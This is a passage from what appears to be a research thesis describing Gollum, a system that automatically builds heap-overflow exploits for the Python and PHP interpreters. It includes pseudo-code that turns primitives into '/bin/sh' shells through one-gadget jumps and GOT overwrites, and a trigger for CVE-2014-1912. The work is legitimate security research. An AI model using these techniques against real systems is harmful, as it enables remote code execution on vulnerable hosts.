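The chapter does not fix a concrete syntax for this markup, so the following sketch invents one—the GOLLUM_* directives are hypothetical—to show how the required information could be recovered from code comments:

```python
import re

# Annotated trigger; the GOLLUM_* directive names are invented for this
# sketch, and the trigger source is only parsed here, never executed.
TRIGGER = '''\
import socket                          # GOLLUM_IMPORT
data = b"X" * 1024                     # GOLLUM_OVERFLOW_VAR max_len=4096
r, w = socket.socketpair()
w.send(data)
r.recvfrom_into(bytearray(), 1024)     # GOLLUM_OVERFLOW_LINE
'''

def parse_markup(src: str) -> dict:
    """Extract the annotated overflow variable, its maximum length, and
    the line number of the statement that triggers the overflow."""
    info = {}
    for lineno, line in enumerate(src.splitlines(), 1):
        if "GOLLUM_OVERFLOW_VAR" in line:
            info["overflow_var"] = line.split("=")[0].strip()
            m = re.search(r"max_len=(\d+)", line)
            if m:
                info["max_len"] = int(m.group(1))
        elif "GOLLUM_OVERFLOW_LINE" in line:
            info["overflow_line"] = lineno
    return info

info = parse_markup(TRIGGER)
assert info["overflow_var"] == "data" and info["overflow_line"] == 5
```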

5.3.2 Test Preprocessing

In the motivating example I stated that the tests provided to Gollum are used directly in the production of new programs. In reality, this depends on how the tests that come with the interpreter are packaged. For primitive discovery, we want the smallest possible code snippets that result in the creation of heap-allocated objects containing pointers, and then the use of those pointers. There are two reasons for this. The first is that in any memory corruption exploit, the target process is usually in a somewhat unstable state where there may have been collateral damage to variables besides those that are necessary for the exploit to succeed. Therefore, we want to minimise the execution of unnecessary code in order to minimise the chances of the process crashing before the exploit succeeds. The second reason is that, since Gollum operates by combining input fragments and observing their behaviour, it is desirable that the tests be as small as possible to allow it to easily correlate runtime behaviour with lines of code in the tests. The test files that come with PHP generally test a single piece of functionality per file. Thus, we can use them directly without any preprocessing. However, the test files distributed with Python usually bundle tests for entire subsystems into a single file. Directly using such files to search for primitives would result in significant amounts of unnecessary code executing per primitive. Fortunately, the tests are structured, with related tests being placed as functions in a subclass of the unittest.TestCase class. In these sub-classes any function name beginning with test_ is considered a standalone test. Gollum splits each test function into its own file, and copies in all of the support classes and functions that it makes use of. The parser for these tests is heuristic; while it successfully extracts many tests, it can fail.
The most common reason for a test failing to successfully execute after being extracted is that the extractor missed a dependency on some variable, class or import in the original test file. To filter out broken tests, each extracted test is run to ensure that it executes successfully.
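A minimal sketch of the splitting step, using Python's ast module; the real extractor also chases variable, class, and import dependencies, which this sketch omits:

```python
import ast
import textwrap

# Example suite in the style of CPython's bundled tests.
SUITE = '''\
import unittest

class SocketTests(unittest.TestCase):
    def test_send(self):
        x = 1
    def test_recv(self):
        y = 2
    def helper(self):
        pass
'''

def split_tests(source: str) -> dict:
    """Extract each test_* method into its own standalone snippet,
    re-wrapped in a minimal TestCase subclass (Python 3.8+ for
    ast.get_source_segment)."""
    tests = {}
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.ClassDef):
            continue
        for item in node.body:
            if isinstance(item, ast.FunctionDef) and item.name.startswith("test_"):
                body = ast.get_source_segment(source, item)
                tests[item.name] = (
                    "import unittest\n\n"
                    f"class {node.name}(unittest.TestCase):\n"
                    + textwrap.indent(body, "    ")
                )
    return tests

extracted = split_tests(SUITE)
assert sorted(extracted) == ["test_recv", "test_send"]   # helper is skipped
```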

5.3.3 New Input Generation

Given a set of test cases and a vulnerability trigger, Gollum can begin searching for exploit primitives. An exploit primitive will require some code that creates a heap-allocated object, some code that triggers the vulnerability, and some code that then makes use of the corrupted data. The tests provide the first and the last of these, while the vulnerability trigger provides the second. The location in the test where the vulnerability is triggered significantly impacts whether a primitive is found or not. For example, if the vulnerability is triggered right at the start of the test, then none of the objects that are later allocated in the file are live and so cannot be corrupted. Alternatively, if the vulnerability is injected at the end of the test then, while there may be live objects, there may not be code to be executed after the vulnerability trigger that will make use of those objects. To maximise the chances of finding useful primitives, new inputs are generated by taking each test and injecting the vulnerability after each location in the test that may cause a heap allocation or update a heap-allocated object. These locations are found heuristically. First Gollum parses the test and searches for function calls and object constructors. Then, for each such location a new input is produced with the vulnerability trigger injected at that location. This produces a very large number of new inputs, e.g. on the order of 100,000 candidates to consider when a single vulnerability is injected into all 12k of the PHP tests. However, as the primitive discovery is performed in a greybox manner, by running the application under different heap layouts and documenting crashes, this is not an issue. Each execution and analysis only takes fractions of a second.

The available primitives will not only depend on where the vulnerability is injected in the test, but also how many bytes of data it corrupts. Recall from Section 5.3.1 that the vulnerability trigger is updated with information indicating the variable that provides the data for the overflow. Gollum will replace the original data used in the vulnerability trigger with new data. The length of this data can be selected by the user, or Gollum can iterate over multiple overflow lengths. The content of that data will be set to a string of characters such that, if the characters are used as a pointer, the pointer is unlikely to be valid.
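The injection heuristic described above can be sketched as follows. The helper names and the single-line overflow() trigger are invented for illustration; the real system injects multi-line triggers and handles imports and nested scopes:

```python
import ast

# A toy test body; expat is never imported because the code is only parsed.
TEST = '''\
p = expat.ParserCreate()
q = [1, 2, 3]
p.Parse("<a/>")
'''
TRIGGER = "overflow()"   # stand-in for the multi-line vulnerability trigger

def injection_points(source: str) -> list:
    """Line numbers of top-level statements containing a call or
    constructor, i.e. statements that may allocate or update heap objects."""
    points = []
    for node in ast.parse(source).body:
        if any(isinstance(n, ast.Call) for n in ast.walk(node)):
            points.append(node.lineno)
    return points

def generate_candidates(source: str, trigger: str):
    """Yield one new program per injection point, with the trigger
    inserted immediately after that statement."""
    lines = source.splitlines()
    for lineno in injection_points(source):
        yield "\n".join(lines[:lineno] + [trigger] + lines[lineno:])

candidates = list(generate_candidates(TEST, TRIGGER))
assert len(candidates) == 2   # the list literal on line 2 is skipped
```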

5.3.4 Heap Layout Exploration

For a given input file containing a trigger for a heap overflow, the behaviour of the interpreter after the overflow depends on the heap layout at the point where the overflow occurs. The heap layout controls what variables get corrupted, and if different variables are corrupted, then the interpreter will behave differently. Thus, for each newly generated input, whether or not it results in a useful primitive depends on the heap layout. A key idea behind Gollum is that it can efficiently explore all possible heap layouts for a given input by using a custom allocator that allows one to request a particular layout. This is far more efficient than hoping that by chance a useful heap layout is produced, or by trying to solve the heap layout problem up front. The memory allocator I developed for use with Gollum is called ShapeShifter. To detect overflows at the point where they occur, rather than when the data is used, ShapeShifter uses the libdislocator library [26]. It forces the last byte of an allocation to be aligned with the end of a page. It then allocates the subsequent page and marks it as inaccessible. When the overflow occurs a fault will therefore be generated, which can be caught. ShapeShifter implements two run modes for use in primitive discovery—one to discover the live heap objects at the point where the overflow occurs, and one to run the program under a specified heap layout. In the first mode, ShapeShifter keeps track of all live heap allocations and when it detects a crash it logs a unique identifier and metadata for each live allocation. The unique identifier is the offset of that allocation in the sequence of allocations. Therefore, it is necessary that the number and order of allocations that take place for a given input are deterministic. The metadata contains the size of each allocation and the offset of any potential pointers within the allocation. Potential pointers are detected heuristically. 
As we know the size of each allocation, we iterate over its contents looking for sequences of bytes that, if considered as a pointer, would be an address in a mapped memory region. In the second mode, ShapeShifter can be provided with identifiers for a source and destination allocation, and it guarantees that the source allocation will be placed in memory immediately before the destination allocation. No guard page is placed in between, so when the overflow occurs the destination will be corrupted without a fault being generated.

Each new input is run under ShapeShifter in its first mode to log all live allocations. Each such live allocation represents memory that the overflow could corrupt if that allocation were placed in memory after the overflow source. Live allocations that do not contain pointers are ignored. For each of the remaining live allocations, the input is then run under ShapeShifter in its second mode, requesting that the allocation be placed after the overflow source. When the overflow occurs it will then corrupt that allocation. If a segmentation fault is detected in this mode it is due to use of the data that has been corrupted by the overflow. When this occurs ShapeShifter logs the instruction that caused the fault and the value of each register. For registers that point to memory locations, 1 KB of data starting at the pointed-to location is also logged.

One potential issue at this stage is that some tests may allocate thousands of objects. Even though the analysis is fast, this could become a problem once the number of heap layouts to consider gets large enough. To mitigate the issue Gollum ignores allocations that do not contain pointers, as previously mentioned. If the total number of candidate destination allocations is larger than a fixed constant (set to 50 by default), Gollum also groups allocations into equivalence classes and processes a single allocation from each equivalence class.
Two allocations are considered equivalent if they have the same size, the same number of potential pointers, and the offsets at which those pointers occur are the same. The intuition behind this grouping is that we want to avoid corrupting multiple instances of the same object type that are in the same state. Instances of the same object type, in the same state, are likely to be of the same size and have pointer fields at the same offsets. Finally, another fixed constant limits the maximum number of layouts that are considered per test (set to 100 by default). I refer to each input file and heap layout pairing that results in a crash as a candidate primitive. The output of this stage is a tuple containing the candidate primitive and the crash information for that candidate primitive, as logged by ShapeShifter.
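The grouping can be sketched as follows, using allocation records shaped like ShapeShifter's live-allocation summaries (the field names here are assumptions based on Listing 5.6):

```python
def dedupe_allocations(allocs):
    """Keep one representative per equivalence class of live allocations.
    Two allocations are equivalent if they have the same size and the
    same pointer offsets (which implies the same number of pointers).
    `allocs` is a list of dicts with 'index', 'size' and 'pointers'
    fields, as in the ShapeShifter summaries; the field names are
    assumptions."""
    classes = {}  # (size, pointer offsets) -> representative allocation
    for alloc in allocs:
        key = (alloc['size'], tuple(alloc['pointers']))
        # The first allocation seen in each class is its representative.
        classes.setdefault(key, alloc)
    return list(classes.values())
```

Only the representatives are then considered as candidate overflow destinations, keeping the number of layouts to explore manageable.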

5.3.5 Primitive Categorisation and Dynamically Discovering I/O Relationships

From the data logged by ShapeShifter, Gollum must determine whether each candidate primitive actually provides a potentially useful exploitation primitive or not. A number of factors go into this decision. The first is the type of instruction that caused the crash. If the crashing instruction changes the control flow of the program based on the value of a register or memory location then we consider the primitive to be an ip-hijack primitive. If the crashing instruction is a memory write then we consider the primitive to be a mem-write primitive. A mem-write primitive usually arises when the overflow corrupts a data pointer that is used as the destination of a write. Depending on what type of data that pointer points to, it could be used in a number of different ways and offer different capabilities to the attacker. The five subcategories of mem-write that we distinguish are as follows:

• Arbitrary write (wr-arb) – A write instruction (e.g. mov, add, sub) in which we control both the destination address and the value being written.

• Write constant (wr-const) – A write instruction in which we control the destination address, but not the source value, and the source value is constant across runs.

• Write variable (wr-var) – A write instruction in which we control the destination address, but not the source value, and the source value is variable across runs.

• Increment memory (inc-mem) – An inc instruction, or an add instruction with a constant value of 1, in which the destination address is controlled.

• Decrement memory (dec-mem) – A dec instruction, or a sub instruction with a constant value of 1, in which the destination address is controlled.
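A rough sketch of how such a categorisation might be computed from a crash report. The inputs (the disassembled mnemonic, taint flags, and whether the source value is constant across runs) are assumptions about the information available at this point, and Gollum's real categorisation logic may differ:

```python
def categorise_crash(disassembly, dst_tainted, src_tainted, src_constant):
    """Map a crashing instruction onto the primitive taxonomy above.
    `dst_tainted` / `src_tainted` say whether the write's destination
    address / source value are attacker controlled; `src_constant` says
    whether the source value was the same across runs."""
    mnemonic = disassembly.split()[0]
    if mnemonic in ('call', 'jmp', 'ret'):
        return 'ip-hijack'
    if mnemonic == 'inc' and dst_tainted:
        return 'inc-mem'
    if mnemonic == 'dec' and dst_tainted:
        return 'dec-mem'
    if mnemonic in ('mov', 'add', 'sub') and dst_tainted:
        if src_tainted:
            return 'wr-arb'
        return 'wr-const' if src_constant else 'wr-var'
    # Anything else (e.g. a crashing read) is not useful here.
    return 'discard'
```

Note this simplification folds the add/sub-by-1 cases into wr-arb/wr-const/wr-var rather than inc-mem/dec-mem; distinguishing them would additionally require inspecting the instruction's immediate operand.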

Crashes for any other reason, e.g., division by zero or a null pointer dereference, are discarded. We also filter out crashes that look like they might be due to use of a null pointer. This is done by checking if the address being called or written to is in the range between 0 and a low constant value, currently set to 1024.

Within each category Gollum then determines which bytes in the input file impact relevant registers or memory locations at the point of the crash, e.g. the registers or memory locations providing the address and value in a mem-write, or the address being called in an ip-hijack. The most fitting solution to this problem may appear to be dynamic taint analysis. However, existing taint tracking engines struggle with false negatives when applied to applications like language interpreters, in which the original input to the program may pass through many layers of translation prior to being used in a manner that is interesting to us (e.g. consider the processing that the JavaScript input to a web browser goes through on its way to being Just-In-Time compiled and executed as native code). These translation layers often make use of indirect data flow, which is a well documented problem for taint tracking engines [100, 101]. Instead, in Gollum I implemented an approach based purely on modifying values in the input program, and observing changes in the machine state at the point of the primitive. This is of course prone to false negatives, but it is fast, straightforward, and works sufficiently well for the specific problem we are trying to solve. The process begins by identifying all string and numeric constants in the input file and then, one at a time, replacing them with numerically increasing values. The overflow contents are almost always relevant, so we start with those.
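The mutate-and-observe idea can be sketched as below. `run_and_snapshot` is a hypothetical stand-in for executing the interpreter under ShapeShifter and logging register values at the crash point, and the sketch handles only numeric constants:

```python
import re

def find_direct_flows(input_text, run_and_snapshot, rounds=3):
    """For each numeric constant in the input, bump it several times and
    diff the crash-point snapshots: a register whose value tracks the
    mutated constant indicates a direct copy from input to machine
    state. `run_and_snapshot` maps an input string to a dict of
    register name -> value at the crash point."""
    flows = {}
    base = run_and_snapshot(input_text)
    for match in re.finditer(r'\d+', input_text):
        const = int(match.group())
        for delta in range(1, rounds + 1):
            mutated = (input_text[:match.start()] +
                       str(const + delta) + input_text[match.end():])
            snapshot = run_and_snapshot(mutated)
            for reg, val in snapshot.items():
                # The register changed with the input, and its new value
                # equals the new constant: a direct f(x) = x flow.
                if base.get(reg) != val and val == const + delta:
                    flows.setdefault(match.group(), set()).add(reg)
    return flows
```

In the real system the same loop must also confirm that each mutated input still reaches the same crashing location before comparing snapshots.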
After each change that results in the same crashing location being reached, the registers and memory locations are checked to see if the change in input has led to a change in their value. This increase-run-check loop is repeated a number of times for each input (currently set to 3). In this manner, Gollum detects direct copying of input values to the resulting values in registers and memory, i.e. a relationship of the form f(x) = x, and I have found this to be sufficient. The output of this stage is a set of primitives categorised by type, as well as information on which registers and memory locations at the crash point are controlled by which values in the input file. This information is saved in the ‘Candidate Primitive Database’, shown in Figure 5.1. For each candidate primitive c in the candidate database the following functions exist:

• category(c) – Returns the candidate’s category.

• tainted_regs(c) – Returns the tainted registers at the crash point. The result is a list of triples of the form (reg, byte_id, input_id), where reg is an identifier for a register, byte_id identifies a byte within that register, and input_id identifies a byte in the input file that directly controls the specified byte within the specified register.

• tainted_mem(c) – Returns the tainted memory locations pointed to by the registers at the crash point. The result is a list of triples of the form (reg, idx, input_id), where reg is a register identifier, idx is an integer specifying an offset from reg, and input_id identifies a byte in the input file that directly controls the location in memory at the specified offset from the specified base register.

• reg_value(c, reg) – Returns the value of the register reg at the primitive’s execution.

• mem_value(c, addr, width) – Returns the value of the memory location indicated by addr and width at the primitive’s execution.
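For illustration, a minimal record type exposing these accessors might look like the following; the field layout is an assumption, not Gollum's actual database schema:

```python
from dataclasses import dataclass

@dataclass
class CandidatePrimitive:
    """Stand-in for one entry in the Candidate Primitive Database.
    Only the accessor names come from the text above; the backing
    fields are assumed."""
    _category: str
    _regs: dict       # register name -> value at the crash point
    _mem: dict        # (addr, width) -> value at the crash point
    _reg_taint: list  # (reg, byte_id, input_id) triples
    _mem_taint: list  # (reg, idx, input_id) triples

    def category(self):
        return self._category

    def tainted_regs(self):
        return self._reg_taint

    def tainted_mem(self):
        return self._mem_taint

    def reg_value(self, reg):
        return self._regs[reg]

    def mem_value(self, addr, width):
        return self._mem[(addr, width)]
```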

5.4 Exploit Generation

Gollum supports both automatic and assisted exploit generation, illustrated by the two paths leading to an exploit in Figure 5.1. I will first discuss automatic exploit generation, and then walk through an example of assisted exploit generation in Section 5.8.

5.4.1 Primitive Transformers

Automatic exploit generation in Gollum is done using primitive transformers. A primitive transformer modifies the candidate primitive based on the available information relating tainted registers and memory to values in the input file, with the goal of producing an exploit that works modulo the heap layout required by the primitive. A primitive transformer consists of a pair of functions, check and transform:

• check(c, ...) – Determines if the associated transform function can be applied to the primitive c to generate an exploit. Exactly what this determination depends on varies based on the type of exploit that the transformer generates, but typically it will involve the primitive’s category, the tainted registers and tainted memory, as well as the memory locations for which we have addresses (due to ASLR breaks).

• transform(c, ...) – Returns a modified version of the provided primitive, rewriting values in the input file based on their relationship with the final values in registers and memory. The modifications made depend on what the transformer is designed to achieve.

Gollum currently provides two primitive transformers—one for generating exploits from ip-hijack primitives, and one for generating exploits from a variant of mem-write primitives, the wr-arb. The goal of both is to spawn a ‘/bin/sh’ shell.

Algorithm 5 Primitive Transformer for ip-hijack

1:  function check(c, libAddrs, gadgets)
2:      if c.category ≠ ip-hijack then
3:          return False, None
4:      else if “libc” not in libAddrs.keys() then
5:          return False, None
6:      for off in range(0, REG_WIDTH/8) do
7:          if not c.isTainted(IP_REG, off) then
8:              return False, None
9:      for g in gadgets do
10:         sat ← True
11:         for gc in g.constraints() do
12:             if gc.onReg() and c.regValue(gc.reg) ≠ 0 then
13:                 sat ← False
14:                 break
15:             else if c.memValue(gc.mem) ≠ 0 then
16:                 sat ← False
17:                 break
18:         if sat then
19:             return True, g
20:     return False, None

21: function transform(c, libAddrs, g)
22:     target ← libAddrs.get(“libc”) + g.offset
23:     exploit ← c.clone()
24:     for off in range(0, REG_WIDTH/8) do
25:         byteVal ← (target ≫ (off ∗ 8)) & 255
26:         srcOff ← c.getTaintingOffset(IP_REG, off)
27:         exploit.updateOffset(srcOff, byteVal)
28:     return exploit

Exploit Generation from an ip-hijack Primitive

The check and transform functions for converting ip-hijack primitives to exploits are shown in Algorithm 5. To generate an exploit from an ip-hijack primitive Gollum uses a ‘one-gadget’ payload. This is a common exploitation strategy in ‘Capture the Flag’ competitions, and has been used by previous AEG tools [41]. A ‘one-gadget’ payload is an address in glibc that, if jumped to, would result in the creation of a ‘/bin/sh’ shell. Such gadgets usually involve jumping into the middle of a function that either directly or indirectly calls execve with ‘/bin/sh’ as its first argument. We use the one_gadget tool [99] to find such addresses. The check function takes the candidate primitive (c), a dictionary mapping from library names to their loaded base addresses (libAddrs), and a list of objects

representing available gadgets (gadgets). It begins by checking that the primitive’s category is correct (lines 2-3) and that the base address of glibc has been made available (lines 4-5). It then checks that the primitive provides sufficient control over the instruction pointer register (lines 6-8).¹ The one_gadget tool provides a list of candidate gadgets, along with a set of constraints that must be satisfied for the gadget to work. The constraints are straightforward and simply a list of registers, or memory locations pointed to by particular registers, that must be zero.² If a gadget exists that has its constraints satisfied (lines 11-17), then check returns that gadget for use by transform (line 19). The transform function computes the address of the gadget that it wishes to call using the gadget offset provided by one_gadget and the glibc base address (line 22). It then rewrites the candidate, replacing the bytes that corrupt the instruction pointer with the address of the gadget (lines 24-27).
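A runnable Python rendering of Algorithm 5, against a toy primitive object. The method names mirror the pseudo-code but are assumptions about Gollum's internals, and the gadget representation is simplified to a dict of offset plus must-be-zero registers:

```python
REG_WIDTH = 64  # register width in bits on x86-64

def check_ip_hijack(c, lib_addrs, gadgets):
    """Algorithm 5's check: is this primitive usable with some gadget?"""
    if c.category != 'ip-hijack' or 'libc' not in lib_addrs:
        return False, None
    # Require control over every byte of the instruction pointer.
    if not all(c.is_tainted('IP_REG', off) for off in range(REG_WIDTH // 8)):
        return False, None
    for g in gadgets:
        # A gadget is usable if every constrained register is zero.
        if all(c.reg_value(r) == 0 for r in g['zero_regs']):
            return True, g
    return False, None

def transform_ip_hijack(c, lib_addrs, g):
    """Algorithm 5's transform: rewrite the input bytes that reach the
    instruction pointer with the gadget's absolute address, low byte
    first."""
    target = lib_addrs['libc'] + g['offset']
    exploit = dict(c.input_bytes)  # clone: input offset -> byte value
    for off in range(REG_WIDTH // 8):
        src_off = c.tainting_offset('IP_REG', off)
        exploit[src_off] = (target >> (off * 8)) & 0xff
    return exploit
```

The gadget offset and base address used in any concrete run would come from one_gadget and an ASLR break respectively; the values in the test below are illustrative only.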

Exploit Generation from a wr-arb Primitive

To generate an exploit from a wr-arb primitive, Gollum uses the primitive to overwrite a function pointer in the .got.plt (Global Offset Table, or GOT) section of the process. This is a standard exploitation technique for memory write primitives on Linux [102], when full RELRO protection is not enabled. It involves replacing a function pointer in the GOT with the address of another function that we wish to redirect execution to, and then triggering a call that uses the replaced function. For example, a common approach is to change the GOT entry for printf to point to the system function instead, then to trigger a call to printf("/bin/sh"). The outcome is that the function that is now pointed to by the GOT entry is called instead of the original function, but provided with the arguments to the original function. Algorithm 6 shows the primitive transformer for this approach. The check function takes as arguments the candidate primitive (c), the dictionary of available library addresses (libAddrs), and the name of the library containing the function we wish to redirect execution to (nlib). check begins by checking that the primitive category for c is correct (lines 2-3), that the base addresses of the library containing the function we wish to redirect execution to, and the GOT section, are available

¹ The presented pseudo-code requires control of the entirety of the register, but depending on the address that is being corrupted and the address we wish to change it to, it may be feasible to generate an exploit when only some of the lower bytes of the register are under our control.

² The constraints exist because the execve function takes two further parameters, besides the first argument specifying the program to run. The second and third arguments represent pointers to the arguments and environment for the new process. If these pointers are zero, then they will be ignored by execve, but if they are not zero they may cause the current process to crash, or the spawned shell to exit immediately with an error.

Algorithm 6 Primitive Transformer for wr-arb

1:  function check(c, libAddrs, nLib)
2:      if c.category ≠ wr-arb then
3:          return False, None
4:      else if nLib not in libAddrs.keys() then
5:          return False, None
6:      else if “.got.plt” not in libAddrs.keys() then
7:          return False, None
8:      for off in range(0, REG_WIDTH/8) do
9:          if not c.isTainted(c.crashIns.dstAddr, off) then
10:             return False, None
11:         else if not c.isTainted(c.crashIns.srcVal, off) then
12:             return False, None
13:     return True, None

14: function transform(c, libAddrs, origOff, nLib, nOff, trigger)
15:     orig ← libAddrs.get(“.got.plt”) + origOff
16:     new ← libAddrs.get(nLib) + nOff
17:     exploit ← c.clone()
18:     for off in range(0, REG_WIDTH/8) do
19:         val ← (new ≫ (off ∗ 8)) & 255
20:         valOff ← c.getTaintingOffset(c.crashIns.srcVal, off)
21:         exploit.updateOffset(valOff, val)
22:         addr ← (orig ≫ (off ∗ 8)) & 255
23:         addrOff ← c.getTaintingOffset(c.crashIns.dstAddr, off)
24:         exploit.updateOffset(addrOff, addr)
25:     exploit.appendAfterOverflow(trigger)
26:     return exploit

(lines 4-7). It then checks that all bytes of the destination address (lines 9-10) and the value being written (lines 11-12) are controllable. The transform function takes four parameters that are specific to this approach: the offset in the GOT of the function we wish to change (origOff), the name of the library containing the function we wish to redirect execution to (nLib), the offset of the function we wish to redirect execution to (nOff), and the string to be injected that will trigger the execution of the function that is being hijacked, with the correct arguments (trigger). transform begins by computing the address in the GOT that we wish to modify (line 15), and the address of the function we wish to redirect execution to (line 16). Then, byte by byte, it updates the exploit, writing the address of the function we wish to trigger into the bytes that control the value being written by the primitive (lines 19-21), and the address in the GOT of the function we wish to hijack into the bytes that control the address being written

to by the primitive (lines 22-24). Finally, transform injects the trigger string into the input program immediately after the line that triggers the overflow (line 25).
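A runnable Python rendering of Algorithm 6's transform, again against a toy primitive object with assumed method names. The library offsets in the usage example are illustrative, not real glibc or GOT offsets:

```python
REG_WIDTH = 64  # register width in bits on x86-64

def transform_wr_arb(c, lib_addrs, orig_off, n_lib, n_off, trigger):
    """Algorithm 6's transform: aim the controlled write at a GOT slot
    and make the written value the address of the replacement function.
    Returns the rewritten input bytes plus the trigger line that the
    caller should append after the overflow, mirroring
    exploit.appendAfterOverflow(trigger) in the pseudo-code."""
    got_slot = lib_addrs['.got.plt'] + orig_off   # where the write lands
    new_func = lib_addrs[n_lib] + n_off           # what gets written there
    exploit = dict(c.input_bytes)  # clone: input offset -> byte value
    for off in range(REG_WIDTH // 8):
        exploit[c.tainting_offset('src_val', off)] = \
            (new_func >> (off * 8)) & 0xff
        exploit[c.tainting_offset('dst_addr', off)] = \
            (got_slot >> (off * 8)) & 0xff
    return exploit, trigger
```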

Validating Exploits

The exploits generated by transform functions are validated by running them and checking that the payload is executed, i.e. that a ‘/bin/sh’ shell is spawned. The output of this stage is a tuple containing an exploit and the required heap layout, as the execution is still performed using ShapeShifter to request the heap layout. Gollum is designed to run on Linux, so to detect the execution of the payload it attaches to the interpreter using the ptrace API and checks to see if it is sent a SIGTRAP signal. A SIGTRAP is sent to the parent process when an execve call succeeds.³

5.5 Solving the Heap Layout Problem

The candidate primitives and exploits are contingent on a particular heap layout holding. Gollum makes use of SHRIKE, with the genetic algorithm, to solve heap layout problems. To briefly recap, SHRIKE operates in the following manner:

1. The exploit developer inserts markup into their exploit indicating the heap layout they require.

2. SHRIKE automatically discovers code fragments that interact with the target’s allocator by parsing its tests.

3. SHRIKE uses the GA to evolve combinations of code fragments towards a solution that achieves the desired heap layout.

The first step is a manual task; therefore, to use SHRIKE in a completely automated fashion, this step must itself be automated. Specifically, Gollum must automatically rewrite candidate exploits to inject SHRIKE directives indicating which allocations are the overflow source and destination, what distance is required between them, and where heap-manipulating code fragments may be inserted. SHRIKE directives are comments injected into the source code of the exploit that are parsed by SHRIKE prior to starting its search. There are three important directives: HEAP-MANIP, RECORD-ALLOC and REQUIRE-DISTANCE. Respectively, they indicate where heap-manipulating code fragments can be injected, which allocation addresses to record, and what distance is required between the allocations that have been

³ See http://man7.org/linux/man-pages/man2/ptrace.2.html

1  class ParserTest(unittest.TestCase):
2      def testParserCreate(self):
3          #X-SHRIKE HEAP-MANIP
4          #X-SHRIKE RECORD-ALLOC 8 1
5          p = expat.ParserCreate()
6          r, w = socket.socketpair()
7          ipv = "\xb3\x8a\xf5"
8          w.send(b"A" * 56 + ipv)
9          #X-SHRIKE RECORD-ALLOC 0 2
10         r.recvfrom_into(bytearray(), 1024)
11         #X-SHRIKE REQUIRE-DISTANCE 1 2 8

Listing 5.2: An exploit with the injected SHRIKE directives describing a heap layout problem to be solved.

recorded. For example, Listing 5.2 shows the exploit from Listing 5.1 after the SHRIKE directives have been injected to describe the heap layout problem that must be solved for the exploit to work. The directive on line 4 tells SHRIKE that the eighth allocation that takes place after line 4 should be associated with the identifier ‘1’. This allocation will be the one containing the function pointer that we wish to corrupt. The directive on line 9 tells SHRIKE to associate the next allocation that takes place with the identifier ‘2’. The directive on line 11 tells SHRIKE that at this point the exploit requires the allocation associated with identifier ‘1’ to be exactly 8 bytes after the address associated with identifier ‘2’.

5.5.1 Automatic Injection of SHRIKE Directives

The RECORD-ALLOC directive takes two parameters. The first is the index of the allocation to record in the stream of allocations that take place after the directive, and the second is an identifier to associate with that allocation. To figure out which lines of code in the exploit trigger which allocations, I added a third run mode to ShapeShifter called the event streaming mode. In this mode, for each execution a stream of ‘events’ is produced. The event stream records allocations as well as the line numbers of the code in the input file that triggered them. Whenever an allocation or free takes place, ShapeShifter checks the program’s environment variables for a variable called EVENT. If that variable is present then its value is logged to the event stream. In this mode, ShapeShifter also logs the details of all allocations. The event stream is thus built by first rewriting the exploit to inject code that, before every line L in the program that may trigger an allocation, adds a code snippet that will add EVENT=L to the program’s environment (see

1  class PyRecvFromInto(PyVuln):
2      def get_imports(self):
3          return "import socket"
4
5      def get_indented(self, ind):
6          r = [
7              ind("# BEGIN-TRIGGER"),
8              ind("r, w = socket.socketpair()"),
9              ind("w.send('{}')".format(
10                 'A' * self.source_size + self._overflow_str)),
11             ind("y = bytearray('B'*{})".format(
12                 self.source_size)),
13             ind("r.recvfrom_into(y, {})".format(
14                 self.overflow_size)),
15             ind("# PRINT-DIST-MARKER"),
16             ind("# END-TRIGGER")]
17         return "\n".join(r)

Listing 5.3: A class representing the vulnerability trigger for CVE-2014-1912

Listing 5.9 for an example). Then the exploit is run under the event streaming mode of ShapeShifter. From the resulting event stream, given the identifier for a particular allocation, e.g., the source or destination, Gollum can figure out the line number in the exploit that caused it, and the offset of the allocation in the stream of allocations triggered by that line. From this information Gollum can insert a RECORD-ALLOC for the source and destination with the correct parameters. A HEAP-MANIP directive is injected immediately prior to each of the two RECORD-ALLOC directives. Finally, the REQUIRE-DISTANCE directive is injected immediately after the line in the exploit that triggers the overflow. Once the rewriting has completed, Gollum has a version of the exploit that is ready to be fed to SHRIKE in order to solve the heap layout problem. The GA is as described in Chapter 4, but extended to work with Python as well as PHP. When the genetic algorithm finds a solution to the heap layout problem, the result is a fully functional exploit that no longer requires ShapeShifter to provide the required heap layout. The resulting exploit is validated by running it under the interpreter and checking that the payload executes successfully.
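The deduction from the event stream can be sketched as follows, assuming the stream is available as a list of ('line', n) and ('alloc', size) entries; this encoding is an assumption about ShapeShifter's log format:

```python
def record_alloc_params(events, target_index):
    """Given an event stream interleaving ('line', n) markers with
    ('alloc', size) records, and the global index of the allocation of
    interest, return the exploit line that triggered it and the
    allocation's offset within that line's allocations -- i.e. the two
    values needed to place a RECORD-ALLOC directive."""
    current_line = None
    offset_in_line = 0
    alloc_index = 0
    for kind, value in events:
        if kind == 'line':
            current_line = value
            offset_in_line = 0
        elif kind == 'alloc':
            if alloc_index == target_index:
                return current_line, offset_in_line
            alloc_index += 1
            offset_in_line += 1
    raise ValueError('allocation index not found in event stream')
```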

5.6 Exploit Generation Walk-through

To provide a concrete example of Gollum’s workflow I will walk through the steps of generating an exploit for CVE-2014-1912. This is a vulnerability in the

Python interpreter that allows writing an arbitrary number of bytes into a buffer with a minimum size of 8, allocated on the system heap. To begin with, the vulnerability trigger is added to Gollum. This is done by creating a class as shown in Listing 5.3. The trigger is lifted almost directly from the Python bug tracker, and parameterised to allow for varying the overflow length and contents (lines 9-14). Exactly how the trigger gets parameterised will depend on the bug, but the parent class (PyVuln) provides variables representing the overflow contents, the source buffer size and the destination buffer size. Another point of note is the comment lines (lines 7, 15, 16). The various components of Gollum are implemented as standalone command line tools, and they communicate necessary information from one stage to the next using a combination of meta-data embedded in the exploit and JSON files on disk. In this case, the ‘# BEGIN-TRIGGER’ and ‘# END-TRIGGER’ lines demarcate the trigger, so that other stages can differentiate it from code scavenged from tests, or injected during heap layout manipulation, as necessary. The ‘# PRINT-DIST-MARKER’ comment indicates to the heap layout manipulation phase the point in the exploit at which to calculate whether the overflow source and destination are adjacent to each other.

To start looking for primitives we also need a set of tests to inject the vulnerability trigger into. Recall that for Python this requires us to first split the tests that come with the interpreter into standalone files. A standalone script (splittests.py) does this, and it can be run once and the results stored. An example of a test produced by this script is shown in Listing 5.4. Originally, this test was in a file with multiple test classes and multiple tests per class. The other class definitions remain (e.g. ParseTest) but their bodies have been removed. The other tests from the SetAttributeTest class have been removed entirely.
